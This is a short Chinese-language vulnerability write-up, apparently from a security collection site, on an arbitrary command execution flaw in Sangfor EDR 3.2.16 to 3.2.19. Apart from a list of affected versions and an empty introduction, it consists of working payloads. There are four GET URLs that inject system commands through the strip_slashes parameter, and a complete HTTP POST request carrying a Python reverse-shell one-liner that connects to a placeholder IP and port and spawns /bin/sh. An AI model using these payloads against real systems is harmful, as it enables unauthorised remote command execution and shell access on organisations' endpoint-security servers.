menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 深信服 终端检测相应平台(EDR) 任意命令执行漏洞(一) chevron_right 深信服 终端检测相应平台(EDR) 任意命令执行漏洞(一).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    深信服 终端检测相应平台(EDR) 任意命令执行漏洞(一).md
    1.6 KB / 2021-07-15 20:14:54
        深信服 终端检测相应平台(EDR) 任意命令执行漏洞(一)
=====================================================

一、漏洞简介
------------

二、漏洞影响
------------

深信服EDR 3.2.16

深信服EDR 3.2.17

深信服EDR 3.2.19

三、复现过程
------------

### payload:

    https://www.0-sec.org/tool/log/c.php?strip_slashes=system&limit=whoami

    https://www.0-sec.org/tool/log/c.php?strip_slashes=system&host=whoami

    https://www.0-sec.org/tool/log/c.php?strip_slashes=system&path=whoami

    https://www.0-sec.org/tool/log/c.php?strip_slashes=system&row=whoami

![1.png](./resource/深信服终端检测相应平台(EDR)任意命令执行漏洞(一)/media/rId25.png)

### 反弹shell payload

    POST /tool/log/c.php HTTP/1.1
    Host: www.0-sec.org
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
    DNT: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Content-Type: application/x-www-form-urlencoded;charset=utf-8
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903
    Content-Length: 256

    strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    links
    file_download